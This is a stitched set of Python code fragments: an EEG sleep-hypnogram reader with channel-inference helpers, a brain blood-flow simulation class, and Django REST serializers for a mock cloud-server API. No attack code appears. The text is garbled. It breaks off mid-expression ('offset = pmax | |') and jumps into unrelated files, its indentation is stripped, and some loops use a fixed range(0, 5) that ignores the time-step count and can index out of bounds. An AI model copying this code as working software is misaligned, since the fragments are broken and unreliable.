elif mode=='luna':
# hypnograms created by Luna software from sleepdata.org
if epochlen_infile is not None:
warnings.warn('epochlen_infile has been supplied, but information is in file, will be ignored')
import xml.etree.ElementTree as ET
root = ET.fromstringlist(lines)
# we don't actually properly parse it as it is intended, just
# assume that it always contains the same labels
instances = root[-1]
stages = []
for instance in instances:
stage_str = instance.attrib['class']
try: stage_nr = conv_dict[stage_str.upper()]
except KeyError as e:
print(f'Unknown sleep stage in file {hypno_file} : {stage_str}')
raise e
duration = int(instance.find('Duration').text)
if duration!=30:
raise ValueError(f'Duration!=30, not expected: {duration}')
stages.extend([stage_nr]*duration)
stages = np.array(stages)
else:
raise ValueError('This is not a recognized hypnogram: {}'.format(hypno_file))
stages = stages[::epochlen]
if len(stages)==0:
print('[WARNING] hypnogram loading failed, len == 0')
return np.array(stages)
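# Hedged usage sketch: round-trip a tiny CSV-style hypnogram (one label per
# 30 s) through read_hypnogram. Written as a helper so it does not run on
# import; the stage codes follow conv_dict above (Wake=0 ... REM=4).
def _demo_read_hypnogram():
    import tempfile
    stages_in = ['WAKE', 'N1', 'N2', 'N3', 'REM']
    with tempfile.NamedTemporaryFile('w', suffix='.csv', delete=False) as tmp:
        tmp.write('\n'.join(stages_in))
        path = tmp.name
    try:
        hypno = read_hypnogram(path, epochlen=30, epochlen_infile=30, mode='csv')
        assert list(hypno) == [0, 1, 2, 3, 4]
    finally:
        os.remove(path)
    return hypno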
def infer_eeg_channels(ch_names):
"""
This function receives a list of channel names and will return
one frontal, one central and one occipital channel.
"""
f = ['EEG Fz', 'EEG F4', 'EEG Fpz', 'EEG Fp1', 'EEG Fp2']
c = ['EEG C4', 'EEG C3']
o = ['EEG Oz', 'EEG O2', 'EEG O1']
found = []
# find frontal channel
for ch in ch_names:
if any([x in ch for x in f]):
found.append(ch)
break
# find central channel
for ch in ch_names:
if any([x in ch for x in c]):
found.append(ch)
break
# find occipital channel
for ch in ch_names:
if any([x in ch for x in o]):
found.append(ch)
break
return found
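# Hedged usage sketch: with a typical channel montage, one channel per region
# is picked, in frontal -> central -> occipital order.
def _demo_infer_eeg_channels():
    chs = ['EEG Fz', 'EEG F3', 'EEG C3', 'EEG C4', 'EEG O1', 'EMG Chin']
    return infer_eeg_channels(chs)  # -> ['EEG Fz', 'EEG C3', 'EEG O1']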
def infer_eog_channels(ch_names):
"""
This function receives a list of channel names and will return
the EOG channels (EOG ROC / EOG LOC) that are present.
"""
eog = ['EOG ROC', 'EOG LOC']
found = []
# find EOG channels
for ch in ch_names:
if any([x in ch for x in eog]):
found.append(ch)
return found
def infer_emg_channels(ch_names):
"""
This function receives a list of channel names and will return
the EMG channels that are present.
"""
emg = ['EM<NAME>']
found = []
# find EMG channels
for ch in ch_names:
if any([x in ch for x in emg]):
found.append(ch)
return found
def hypno2time(hypno, seconds_per_epoch=1):
"""
Converts a hypnogram based in epochs into the format as defined
by VisBrain: http://visbrain.org/sleep.html#save-hypnogram
"""
hypno = np.repeat(hypno, seconds_per_epoch)
s = '*Duration_sec {}\n'.format(len(hypno))
stages = ['Wake', 'N1', 'N2', 'N3', 'REM', 'Art']
d = dict(enumerate(stages))
hypno_str = [d[h] for h in hypno]
last_stage=hypno_str[0]
for second, stage in enumerate(hypno_str):
if stage!=last_stage:
s += '{}\t{}\n'.format(last_stage, second)
last_stage=stage
s += '{}\t{}\n'.format(stage, second+1)
return s
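# Hedged illustration of the VisBrain time-based format produced above:
# three 1-second epochs [Wake, Wake, N1] become a duration header plus one
# line per stage giving the second at which that stage ends.
def _demo_hypno2time():
    out = hypno2time([0, 0, 1], seconds_per_epoch=1)
    assert out.splitlines()[0] == '*Duration_sec 3'
    assert out.splitlines()[1].startswith('Wake')
    return out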
def write_hypnogram(hypno, filename, seconds_per_annotation=30,
comment=None, overwrite=False):
"""
Save a hypnogram based on annotations per epochs in VisBrain style
(ie. The exact onset of each sleep stage is annotated in time space.)
This format is recommended for saving hypnograms as it avoids ambiguity.
:param filename: where to save the data
:param hypno: The hypnogram either as list or np.array
:param seconds_per_epoch: How many seconds each annotation contains
:param comment: Add a comment to the beginning of the file
:param overwrite: overwrite file?
"""
assert not ospath.exists(filename) or overwrite, \
'File already exists, no overwrite'
hypno = np.repeat(hypno, seconds_per_annotation)
hypno_str = hypno2time(hypno)
if comment is not None:
comment = comment.replace('\n', '\n*')
hypno_str = '*' + comment + '\n' + hypno_str
hypno_str = hypno_str.replace('\n\n', '\n')
with open(filename, 'w') as f:
f.write(hypno_str)
return True
def minmax2lsb(dmin, dmax, pmin, pmax):
"""
converts the edf min/max values to lsb and offset (x*m+b)
"""
lsb = (pmax - pmin) / (dmax - dmin)
offset = pmax | |
np.inf, 'maxiter': 40000}}
# minimizer_kwargs = {'method': 'L-BFGS-B', 'args': (eqnInfoDictList, fluidMethod, errorNorm), 'bounds': boundsVelocityPressure, 'options': {'maxiter': 40000, 'maxfun': 40000}}
optResult = basinhopping(computeNetworkDetail, velocityPressureInit, minimizer_kwargs=minimizer_kwargs, niter=100, T=1000, stepsize=500, interval=5, niter_success=15, disp=True)
velocityPressure = np.abs(optResult.x)
cost = optResult.fun
message = optResult.message
print('cost={}, message={}'.format(cost, message))
pressures = velocityPressure[numOfEdges:]
print('Minimum pressure is {} mmHg and maximum pressure is {} mmHg'.format((np.amin(pressures))/13560/9.8*1000, (np.amax(pressures))/13560/9.8*1000))
velocities = velocityPressure[:numOfEdges]
print('Minimum velocity is {} m/s and maximum velocity is {} m/s'.format(np.amin(velocities), np.amax(velocities)))
self.velocityPressure = velocityPressure
self.validateFluidEquations(velocityPressure=velocityPressure)
if saveResult:
directory = self.directory
saveFolderPath = join(directory, 'fluidSimulationResult')
saveFileName = 'fluidSimulationResult_GBMTest5_Timestep={}_v1.pkl'.format(currentTimeStep)
resultDict = {'G': copy.deepcopy(self.G), 'nodeInfoDict': copy.deepcopy(self.nodeInfoDict), 'edgeInfoDict': copy.deepcopy(self.edgeInfoDict),
'velocityPressure': copy.deepcopy(velocityPressure)}
with open(join(saveFolderPath, saveFileName), 'wb') as f:
pickle.dump(resultDict, f, 2)
print('{} saved to {}'.format(saveFileName, saveFolderPath))
elapsed = timeit.default_timer() - start_time
print('Elapsed time for function {}: {} sec'.format(functionName, elapsed))
# Clear the simulation result #
# for node in G.nodes():
# self.nodeInfoDict[node]['simulationData'] = {'pressure': None, 'flow': None} # placeholders, None means unset
# for edgeIndex in edgeIndexList:
# self.edgeInfoDict[edgeIndex]['simulationData'] = {'velocity': None, 'flow': None} # placeholders, None means unset
def GBMTest5b(self, numOfTimeSteps=4, interpolationOption=1, saveResult=False):
"""
Using the GBM network and the radius info from BraVa and 2013, interpolate the radius (in different ways) for
the time point in between, TODO !!!
numOfTimeSteps has to be >= 2 (including the two end time steps)
interpolationOption=1 interpolates the radius linearly, interpolationOption=2 uses a logistic curve (bent
upwards), interpolationOption=3 uses a logistic curve (bent downwards)
Saved Result:
fluidSimulationResultTest6_Timestep={}_v1.pkl: everything normal
"""
start_time = timeit.default_timer()
functionName = inspect.currentframe().f_code.co_name
self.loadNetwork(version=4, year='BraVa')
self.convertNetowrk()
self.adjustNetwork()
self.setNetwork(option=2)
self.createGroundTruth(option=2) # just to get nodeIndex and edgeIndex and isBifurcatingNode
volumePerPartitionGroundTruth = self.getVolumePerPartition()
print('Ground truth:')
self.printTerminatingPressurePerPartition()
edgeIndexList = self.edgeIndexList
G = self.G
edgeRadiusTimeStepList = np.zeros((len(edgeIndexList), numOfTimeSteps)).tolist()
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][0] = radius
# Change the radius #
# extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,4,7,9,11,5,6]}
extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,7]}
self.perturbNetwork(option=2, extraInfo=extraInfo)
self.setNetwork(option=2)
# success = self.createGroundTruth(option=2)
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][-1] = radius
# Interpolate the radius for other time steps #
if interpolationOption == 1:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) / (numOfTimeSteps - 1) * ii + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
elif interpolationOption == 2:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) * np.tanh(ii / (numOfTimeSteps-1) * 2) + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
# print(edgeRadiusTimeStepList)
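# Worked example of the two interpolation options (illustrative numbers, not
# taken from the data): with radiusHead=2.0, radiusTail=1.0 and numOfTimeSteps=4,
#   option 1 (linear): r_ii = (1.0-2.0)/3*ii + 2.0          -> 2.00, 1.67, 1.33, 1.00
#   option 2 (tanh):   r_ii = (1.0-2.0)*tanh(2*ii/3) + 2.0   -> 2.00, 1.42, 1.13, (1.04)
# The tanh curve does not pass exactly through radiusTail; the last entry is
# assigned radiusTail directly from the perturbed network above.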
# Clear the simulation result #
# for node in G.nodes():
# self.nodeInfoDict[node]['simulationData'] = {'pressure': None, 'flow': None} # placeholders, None means unset
# for edgeIndex in edgeIndexList:
# self.edgeInfoDict[edgeIndex]['simulationData'] = {'velocity': None, 'flow': None} # placeholders, None means unset
nodeInfoDict = self.nodeInfoDict
edgeInfoDict = self.edgeInfoDict
maxTimeStep = numOfTimeSteps
# fitResultPerPartition = self.fitTerminatingPressureToPathLength(showFittingResult=True, figIndex=2, isLastFigure=True)
fitResultPerPartition = self.fitTerminatingPressureToPathLength()
# Start from T1 because T0 is used as a reference case (but still solve T0 just to make a record)
for currentTimeStep in range(0, 5):
print('##### currentTimeStep={} #####'.format(currentTimeStep))
radiusList = [edgeRadiusTimeStepList[edgeIndex][currentTimeStep] for edgeIndex in edgeIndexList]
self.updateEdgeRadius(radiusList)
volumePerPartition = self.getVolumePerPartition()
pressureDropChangePerPartition = {}
for partitionName, volume in volumePerPartition.items():
volumeGroundTruth = volumePerPartitionGroundTruth[partitionName]
volumeChange = (volume - volumeGroundTruth) / volumeGroundTruth
pressureDropChangePerPartition[partitionName] = -volumeChange
print(pressureDropChangePerPartition)
def GBMTest6(self, numOfTimeSteps=4, interpolationOption=1, saveResult=False):
"""
Exactly the same as GBMTest5, tweaked the solver setting a little, trying to see if results can be improved.
numOfTimeSteps has to be >= 2 (including the two end time steps)
interpolationOption=1 interpolates the radius linearly, interpolationOption=2 uses a logistic curve (bent
upwards), interpolationOption=3 uses a logistic curve (bent downwards)
Saved Result:
fluidSimulationResult_GBMTest6_Timestep={}_v1.pkl: everything normal
"""
start_time = timeit.default_timer()
functionName = inspect.currentframe().f_code.co_name
self.loadNetwork(version=4, year='BraVa')
self.convertNetowrk()
self.adjustNetwork()
self.setNetwork(option=2)
self.createGroundTruth(option=2) # just to get nodeIndex and edgeIndex and isBifurcatingNode
volumePerPartitionGroundTruth = self.getVolumePerPartition()
print('Ground truth:')
self.printTerminatingPressurePerPartition()
edgeIndexList = self.edgeIndexList
G = self.G
edgeRadiusTimeStepList = np.zeros((len(edgeIndexList), numOfTimeSteps)).tolist()
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][0] = radius
# Change the radius #
# extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,4,7,9,11,5,6]}
extraInfo = {'perturbedYear': 2013, 'excludedEdgeIndex': [0,1,2,3,7]}
self.perturbNetwork(option=2, extraInfo=extraInfo)
self.setNetwork(option=2)
# success = self.createGroundTruth(option=2)
for edgeIndex in edgeIndexList:
radius = self.edgeInfoDict[edgeIndex]['meanRadius']
edgeRadiusTimeStepList[edgeIndex][-1] = radius
# Interpolate the radius for other time steps #
if interpolationOption == 1:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) / (numOfTimeSteps - 1) * ii + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
elif interpolationOption == 2:
for edgeIndex in edgeIndexList:
radiusHead, radiusTail = edgeRadiusTimeStepList[edgeIndex][0], edgeRadiusTimeStepList[edgeIndex][-1]
for ii in range(1, numOfTimeSteps-1):
radius = (radiusTail - radiusHead) * np.tanh(ii / (numOfTimeSteps-1) * 2) + radiusHead
edgeRadiusTimeStepList[edgeIndex][ii] = radius
# print(edgeRadiusTimeStepList)
# Clear the simulation result #
# for node in G.nodes():
# self.nodeInfoDict[node]['simulationData'] = {'pressure': None, 'flow': None} # placeholders, None means unset
# for edgeIndex in edgeIndexList:
# self.edgeInfoDict[edgeIndex]['simulationData'] = {'velocity': None, 'flow': None} # placeholders, None means unset
nodeInfoDict = self.nodeInfoDict
edgeInfoDict = self.edgeInfoDict
maxTimeStep = numOfTimeSteps
# fitResultPerPartition = self.fitTerminatingPressureToPathLength(showFittingResult=True, figIndex=2, isLastFigure=True)
fitResultPerPartition = self.fitTerminatingPressureToPathLength()
# Start from T1 because T0 is used as a reference case (but still solve T0 just to make a record)
for currentTimeStep in range(0, 5):
print('##### currentTimeStep={} #####'.format(currentTimeStep))
radiusList = [edgeRadiusTimeStepList[edgeIndex][currentTimeStep] for edgeIndex in edgeIndexList]
self.updateEdgeRadius(radiusList)
volumePerPartition = self.getVolumePerPartition()
pressureDropChangePerPartition = {}
for partitionName, volume in volumePerPartition.items():
volumeGroundTruth = volumePerPartitionGroundTruth[partitionName]
volumeChange = (volume - volumeGroundTruth) / volumeGroundTruth
pressureDropChangePerPartition[partitionName] = -volumeChange
extraInfo = {'pressureDropChangePerPartition': pressureDropChangePerPartition}
self.perturbTerminatingPressure(option=5, extraInfo=extraInfo)
self.printTerminatingPressurePerPartition()
computeNetworkDetailExtraInfo = None
numOfNodes = len([node for node in nodeInfoDict if 'argsIndex' in nodeInfoDict[node]])
numOfEdges = len([edgeIndex for edgeIndex in edgeIndexList if 'argsIndex' in edgeInfoDict[edgeIndex]])
pressureIn = 13560 * 9.8 * 0.12 # Pascal # check if this number is consistent with that was used in the reference case!
velocityPressureInit = np.hstack((np.full((numOfEdges,), 0.4), np.linspace(pressureIn*0.8, pressureIn*0.5, numOfNodes)))
velocityPressureInit = [float(p) for p in velocityPressureInit]
# bounds in the form of ((min, min...), (max, max...)) #
# boundsVelocityPressure = [[], []] # first sublist contains lower bound and the second sublist contains upper bound
# boundsVelocityPressure[0] = [0] * numOfEdges + [13560*9.8*0.00] * numOfNodes # min velocity = 0 m/s, min pressure = 0 mmHg
# boundsVelocityPressure[1] = [5] * numOfEdges + [13560*9.8*0.12] * numOfNodes # max velocity = 5 m/s, max pressure = 120 mmHg
# boundsVelocityPressure = tuple(map(tuple, boundsVelocityPressure))
# bounds in the form of ((min, max), (min, max)...) #
boundsVelocityPressure = [[0, 5]] * numOfEdges + [[13560*9.8*0.00, 13560*9.8*0.12]] * numOfNodes
# Improve the lower bound of pressures at each node
# self.calculateVariableBounds()
# for node in G.nodes():
# if 'argsIndex' in nodeInfoDict[node]:
# argsIndex = self.nodeInfoDict[node]['argsIndex']
# minPressure = self.nodeInfoDict[node]['simulationData']['minPressure']
# boundsVelocityPressure[argsIndex][0] = minPressure
# boundsVelocityPressure = tuple(map(tuple, boundsVelocityPressure))
fluidMethod = 'HW'
# basinhopping, bounds in (min, max) pair form #
self.setupFluidEquations()
eqnInfoDictList = self.eqnInfoDictList
errorNorm = 2
minimizer_kwargs = {'method': 'BFGS', 'args': (eqnInfoDictList, fluidMethod, errorNorm, computeNetworkDetailExtraInfo), 'options': {'norm': np.inf, 'maxiter': 40000}}
# minimizer_kwargs = {'method': 'L-BFGS-B', 'args': (eqnInfoDictList, fluidMethod, errorNorm), 'bounds': boundsVelocityPressure, 'options': {'maxiter': 40000, 'maxfun': 40000}}
optResult = basinhopping(computeNetworkDetail, velocityPressureInit, minimizer_kwargs=minimizer_kwargs, niter=100, T=2000, stepsize=1000, interval=5, niter_success=16, disp=True)
velocityPressure = np.abs(optResult.x)
cost = optResult.fun
message = optResult.message
print('cost={}, message={}'.format(cost, message))
pressures = velocityPressure[numOfEdges:]
print('Minimum pressure is {} mmHg and maximum pressure is {} mmHg'.format((np.amin(pressures))/13560/9.8*1000, (np.amax(pressures))/13560/9.8*1000))
velocities = velocityPressure[:numOfEdges]
print('Minimum velocity is {} m/s and maximum velocity is {} m/s'.format(np.amin(velocities), np.amax(velocities)))
self.velocityPressure = velocityPressure
self.validateFluidEquations(velocityPressure=velocityPressure)
if saveResult:
directory = self.directory
saveFolderPath = join(directory, 'fluidSimulationResult')
saveFileName = 'fluidSimulationResult_GBMTest6_Timestep={}_v1.pkl'.format(currentTimeStep)
resultDict = {'G': copy.deepcopy(self.G), 'nodeInfoDict': copy.deepcopy(self.nodeInfoDict), 'edgeInfoDict': copy.deepcopy(self.edgeInfoDict),
'velocityPressure': copy.deepcopy(velocityPressure)}
with open(join(saveFolderPath, saveFileName), 'wb') as f:
pickle.dump(resultDict, f, 2)
print('{} saved to {}'.format(saveFileName, saveFolderPath))
elapsed = timeit.default_timer() - start_time
print('Elapsed time for function {}: {} sec'.format(functionName, elapsed))
def computeNetworkTest(self, saveResult=False):
"""
Check whether the solver can correctly solve a system by creating a ground-truth model first and comparing the simulation result with it
# File: ao/upcloud/serializers.py
from rest_framework import serializers
from rest_framework import fields
from ao.core import fields as ao_fields
from ao.core import utils
from . import settings
from . import models
from . import factories
class SerializerMixin(object):
def __init__(self, *args, **kwargs):
self.account = kwargs.pop('account', None)
super(SerializerMixin, self).__init__(*args, **kwargs)
class AccountSerializer(serializers.ModelSerializer):
class Meta:
model = models.Account
fields = '__all__'
def to_representation(self, instance):
data = super(AccountSerializer, self).to_representation(instance)
data = {
'account': {
'credits': data['credits'],
'username': data['username']
}
}
return data
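# The serializers in this module wrap their output in the nested envelopes used by the
# UpCloud-style JSON API. For example, AccountSerializer above renders roughly as
# (illustrative values only):
#   {"account": {"credits": 10000, "username": "demo"}}
# and the List* serializers below apply the same idea one level up, e.g.
#   {"zones": {"zone": [...]}}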
class ListZoneSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListZoneSerializer, self).to_representation(instance)
data = {'zones': {'zone': data}}
return data
@property
def data(self):
super(ListZoneSerializer, self).data
return self._data
class ZoneSerializer(serializers.ModelSerializer):
"""Zone serializer"""
class Meta:
model = models.Zone
fields = '__all__'
list_serializer_class = ListZoneSerializer
def to_representation(self, instance):
data = super(ZoneSerializer, self).to_representation(instance)
data = {'zones': {'zone': data}}
return data
class ListPlanSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListPlanSerializer, self).to_representation(instance)
data = {'plans': {'plan': data}}
return data
@property
def data(self):
super(ListPlanSerializer, self).data
return self._data
class PlanSerializer(serializers.ModelSerializer):
class Meta:
model = models.Plan
fields = '__all__'
list_serializer_class = ListPlanSerializer
def to_representation(self, instance):
data = super(PlanSerializer, self).to_representation(instance)
data = {'plans': {'plan': data}}
return data
class ListIpAddressSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListIpAddressSerializer, self).to_representation(instance)
data = {'ip_addresses': {'ip_address': data}}
return data
@property
def data(self):
super(ListIpAddressSerializer, self).data
return self._data
class IpAddressSerializer(serializers.ModelSerializer):
part_of_plan = ao_fields.YesNoField(required=False)
server = serializers.PrimaryKeyRelatedField(queryset=models.Server.objects.all(), required=False)
action_level = settings.IP_ADDRESS_ACTION_LEVEL
class Meta:
model = models.IpAddress
fields = '__all__'
def validate_server(self, value):
exists = models.Server.objects.filter(uuid=value.uuid).exists()
if exists:
value = str(models.Server.objects.get(uuid=value.uuid).uuid)
elif not exists and self.action_level == 0:
value = str(factories.ServerFactory(uuid=value.uuid).uuid)
else:
raise serializers.ValidationError('')
return value
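# Pattern used throughout this module: when the referenced object does not exist and the
# relevant *_ACTION_LEVEL / CREATION_LEVEL setting equals 0, a stand-in object is created
# through the `factories` module instead of rejecting the request; otherwise a
# ValidationError is raised. (This reading of the settings is inferred from their usage
# in this file.)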
def to_representation(self, instance):
data = super(IpAddressSerializer, self).to_representation(instance)
return data
class IpAddressListSerializer(IpAddressSerializer):
part_of_plan = ao_fields.YesNoField(required=False, write_only=True)
class Meta:
model = models.IpAddress
fields = '__all__'
list_serializer_class = ListIpAddressSerializer
class IpAddressDetailSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = '__all__'
def to_representation(self, instance):
data = super(IpAddressDetailSerializer, self).to_representation(instance)
data = {'ip_address': data}
return data
class CreateIpAddressSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = ('family', 'access', 'server')
class PostIpAddressSerializer(SerializerMixin, serializers.Serializer):
ip_address = CreateIpAddressSerializer()
def save(self, *args, **kwargs):
ip_data = self.validated_data['ip_address']
if settings.IP_ADDRESS_ACTION_LEVEL == 0:
server = models.Server.objects.filter(uuid=ip_data.pop('server')).first()
ip_data.update(server=server,
server__account=self.account)
instance = factories.IpAddressFactory(**ip_data)
else:
# TODO: Manage public/private
address = factories.fake.ipv4() if ip_data['family'] == 'IPV4' else factories.fake.ipv6()
ptr_record = '%s.v6.zone.host.upcloud.com' % factories.fake.user_name()
ip_data.update(address=address,
part_of_plan=False,
ptr_record=ptr_record)
instance = models.IpAddress.objects.create(**ip_data)
instance.family = factories.make_ip_family(instance)
return instance
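# Sketch of the request body this serializer is meant to consume (field names follow
# CreateIpAddressSerializer above; values are placeholders, not real API data):
#   {"ip_address": {"family": "<models.IP_FAMILIES value>",
#                   "access": "<models.IP_ACCESSES value>",
#                   "server": "<server uuid>"}}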
class ModifyIpAddressSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = ('ptr_record',)
def update(self, *args, **kwargs):
pass
class PutIpAddressSerializer(SerializerMixin, serializers.Serializer):
ip_address = ModifyIpAddressSerializer()
def save(self, *args, **kwargs):
self.instance.ptr_record = self.validated_data['ip_address']['ptr_record']
self.instance.save()
return self.instance
@property
def data(self):
serializer = IpAddressListSerializer(self.instance)
return serializer.data
class ListStorageSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListStorageSerializer, self).to_representation(instance)
data = {'storage_devices': {'storage_device': data}}
return data
@property
def data(self):
super(ListStorageSerializer, self).data
return self._data
class ServerStorageSerializer(serializers.ModelSerializer):
part_of_plan = ao_fields.YesNoField(required=False)
server = serializers.PrimaryKeyRelatedField(queryset=models.Server.objects.all(), required=False)
class Meta:
model = models.Storage
fields = '__all__'
list_serializer_class = ListStorageSerializer
def to_internal_value(self, data):
data = data['storage_device']
return super(ServerStorageSerializer, self).to_internal_value(data)
class ServerIpsSerializer(serializers.Serializer):
access = fields.ChoiceField(choices=models.IP_ACCESSES)
family = fields.ChoiceField(choices=models.IP_FAMILIES, default='ipv4')
def create(self, *args, **kwargs):
pass
class ServerIpSerializer(serializers.Serializer):
ip_address = ServerIpsSerializer(many=True)
def create(self, *args, **kwargs):
pass
class SshKeyListSerializer(serializers.Serializer):
ssh_key = ao_fields.SshKeyListField()
def create(self, *args, **kwargs):
pass
class ServerLoginUserSerializer(serializers.Serializer):
create_password = ao_fields.YesNoField(default='<PASSWORD>')
username = fields.CharField(default='root')
ssh_keys = SshKeyListSerializer()
def create(self, *args, **kwargs):
pass
STORAGE_ACTIONS = ('create', 'clone', 'attach')
STORAGE_TYPES = ('disk', 'cdrom')
class ServerStorageDeviceSerializer(serializers.Serializer):
action = fields.ChoiceField(choices=STORAGE_ACTIONS)
address = fields.CharField(required=False)
size = fields.IntegerField(min_value=10, max_value=1024)
tier = fields.ChoiceField(choices=models.STORAGE_TIERS, default='hdd', required=False)
title = fields.CharField(required=False)
type = fields.ChoiceField(choices=STORAGE_TYPES, default='disk', required=False)
storage = fields.CharField()
def validate_storage(self, value):
exists = models.Storage.objects.filter(uuid=value).exists()
if exists:
pass
elif not exists and settings.CREATION_LEVEL == 0:
value = factories.StorageFactory(uuid=value).uuid
return value
def create(self, *args, **kwargs):
pass
class ServerStorageDeviceListSerializer(serializers.Serializer):
storage_device = ServerStorageDeviceSerializer(many=True)
def create(self, *args, **kwargs):
pass
class ListServerSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListServerSerializer, self).to_representation(instance)
data = {'servers': {'server': data}}
return data
@property
def data(self):
super(ListServerSerializer, self).data
return self._data
PASSWORD_DELIVERIES = ('none', 'email', 'sms')
class ServerSerializer(serializers.ModelSerializer):
firewall = ao_fields.OnOffField(required=False)
timezone = fields.CharField(required=False)
ip_addresses = ServerIpSerializer(required=False)
login_user = ServerLoginUserSerializer(required=False)
storage_devices = ServerStorageDeviceListSerializer(required=False)
password_delivery = fields.ChoiceField(choices=PASSWORD_DELIVERIES, default='none', required=False)
class Meta:
model = models.Server
exclude = ('host', 'state')
def validate_plan(self, value):
if value == 'custom':
return None
exists = models.Plan.objects.filter(name=value).exists()
if exists:
pass
elif not exists and settings.CREATION_LEVEL == 0:
value = factories.PlanFactory(name=value)
else:
raise serializers.ValidationError('')
return value
def validate_zone(self, value):
exists = models.Zone.objects.filter(id=value).exists()
if exists:
pass
elif not exists and settings.CREATION_LEVEL == 0:
value = factories.ZoneFactory(id=value)
else:
raise serializers.ValidationError('')
return value
class ServerListSerializer(ServerSerializer):
"""ListView Serializer"""
class Meta:
model = models.Server
exclude = ('account',)
list_serializer_class = ListServerSerializer
STOP_TYPES = ('soft', 'hard')
class StopServerSerializer(serializers.Serializer):
stop_type = fields.ChoiceField(STOP_TYPES, required=False, default='soft')
timeout = fields.IntegerField(min_value=1, max_value=600, required=False, default=1)
class PostStopServerSerializer(serializers.Serializer):
stop_server = StopServerSerializer()
TIMEOUT_ACTIONS = ('destroy', 'ignore')
class RestartServerSerializer(StopServerSerializer):
timeout_action = fields.ChoiceField(TIMEOUT_ACTIONS, required=False, default='ignore')
class PostRestartServerSerializer(serializers.Serializer):
restart_server = RestartServerSerializer()
class ServerListIpAddressesSerializer(serializers.ListSerializer):
def to_representation(self, instance):
data = super(ServerListIpAddressesSerializer, self).to_representation(instance)
return {'ip_address': data}
class ServerIpAddressesSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = ('access', 'address', 'family')
list_serializer_class = ServerListIpAddressesSerializer
def to_internal_value(self, data):
data = data['ip_address']
return super(ServerIpAddressesSerializer, self).to_internal_value(data)
class ServerListStorageSerializer(serializers.ListSerializer):
def to_representation(self, instance):
data = super(ServerListStorageSerializer, self).to_representation(instance)
return {'storage_device': data}
def to_internal_value(self, data):
data = data['storage_device']
return super(ServerListStorageSerializer, self).to_internal_value(data)
class ServerStoragesSerializer(ServerStorageSerializer):
storage = fields.UUIDField(source='uuid')
storage_size = fields.IntegerField(source='size')
storage_title = fields.CharField(source='title')
class Meta:
model = models.Storage
list_serializer_class = ServerListStorageSerializer
fields = ('part_of_plan', 'address', 'storage', 'storage_size', 'storage_title', 'type')
class ServerDetailSerializer(ServerSerializer):
ip_addresses = ServerIpAddressesSerializer(source='ipaddress_set', many=True, required=False)
storage_devices = ServerStoragesSerializer(source='storage_set', many=True, required=False)
class Meta:
model = models.Server
fields = (
'uuid',
'title',
'hostname',
'licence',
'plan',
'core_number',
'memory_amount',
'state',
'zone',
'firewall',
'boot_order',
'host',
'nic_model',
'timezone',
'ip_addresses',
'storage_devices',
)
def to_representation(self, instance):
data = super(ServerDetailSerializer, self).to_representation(instance)
data = {'server': data}
return data
def to_internal_value(self, data):
data = data['server']
return super(ServerDetailSerializer, self).to_internal_value(data)
class PostServerStorageSerializer(ServerStorageSerializer):
class Meta:
model = models.Storage
list_serializer_class = ListStorageSerializer
fields = (
# 'action',
'address',
'size',
# 'storage',
'tier',
'title',
'type',
)
class PostServerSerializer(ServerDetailSerializer):
storage_devices = PostServerStorageSerializer(many=True, required=False)
def _clone_storage(self, server, storage_device):
base_storage = models.Storage.objects.filter(uuid=storage_device['storage']).first()
if settings.STORAGE_ACTION_LEVEL == 0:
if base_storage is None:
base_storage = factories.StorageFactory(
access='private',
type='disk',
part_of_plan=False,
zone=server.zone,
account=server.account)
base_storage.uuid = None
base_storage.server = server
base_storage.state = 'maintenance'
base_storage.save()
storage = base_storage
return storage
def _create_storage(self, server, storage_device):
storage = models.Storage.objects.create(
title=storage_device['title'],
access='private',
type=storage_device.get('type', 'disk'),
tier=storage_device['tier'],
size=storage_device['size'],
part_of_plan=False,
zone=server.zone,
server=server,
address=storage_device.get('address', ''),
account=server.account)
return storage
def _attach_storage(self, server, storage_device):
storage = models.Storage.objects.filter(uuid=storage_device['storage']).first()
if storage is None and settings.STORAGE_ACTION_LEVEL == 0:
storage = factories.StorageFactory(
access='private',
type='disk',
part_of_plan=False,
zone=server.zone,
account=server.account)
return storage
def create(self, *args, **kwargs):
server_data = self.validated_data.copy()
login_user = server_data.pop('login_user', None)
storage_devices = server_data.pop('storage_devices', None)
password_delivery = server_data.pop('password_delivery', None)
# Server
if settings.SERVER_ACTION_LEVEL == 0:
server = factories.ServerFactory(
account=self.account,
state='started',
**server_data)
else:
server = models.Server.objects.create(
account=self.account,
**server_data)
# Storages
for storage_device in (storage_devices or []):
if storage_device['action'] == 'clone':
